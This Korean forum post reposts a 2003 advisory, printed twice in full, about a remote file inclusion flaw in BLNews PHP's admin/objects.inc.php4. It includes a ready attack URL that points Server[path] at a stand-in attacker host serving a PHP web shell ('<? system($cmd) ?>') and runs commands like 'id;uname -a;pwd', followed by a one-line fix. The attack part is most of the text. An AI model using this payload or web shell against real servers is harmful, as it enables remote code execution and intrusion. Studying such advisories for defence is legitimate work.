리눅스 분류
BLNews php 이용한 해킹기법 공개
작성자 정보
- 관리자 작성
- 작성일
컨텐츠 정보
- 1,813 조회
- 0 추천
- 목록
본문
공격용 소스코드 제목 :
BLNews PHP 소스코드 삽입
발표날짜 :
2003.05.26
해당 시스템 :
PHP
문제점 :
------------admin/objects.inc.php4------------
if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");
-----------------------------------------------------
이 부분에서 개발자는 include("server.inc.php4") 를 집어 넣는것을 잊은것이 문제이다.
공격법 / 공격용 소스코드 :
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4
with
<? system($cmd) ?>
Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;
대응책 :
if ($itheme!="blubb") 앞에 다음과 같은 문장을 삽입하면 된다.
include("server.inc.php4");
출처: http://www.hackersnews.org/
BLNews PHP 소스코드 삽입
발표날짜 :
2003.05.26
해당 시스템 :
PHP
문제점 :
------------admin/objects.inc.php4------------
if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");
-----------------------------------------------------
이 부분에서 개발자는 include("server.inc.php4") 를 집어 넣는것을 잊은것이 문제이다.
공격법 / 공격용 소스코드 :
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4
with
<? system($cmd) ?>
Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;
대응책 :
if ($itheme!="blubb") 앞에 다음과 같은 문장을 삽입하면 된다.
include("server.inc.php4");
출처: http://www.hackersnews.org/
관련자료
-
이전
-
다음
댓글 0
등록된 댓글이 없습니다.
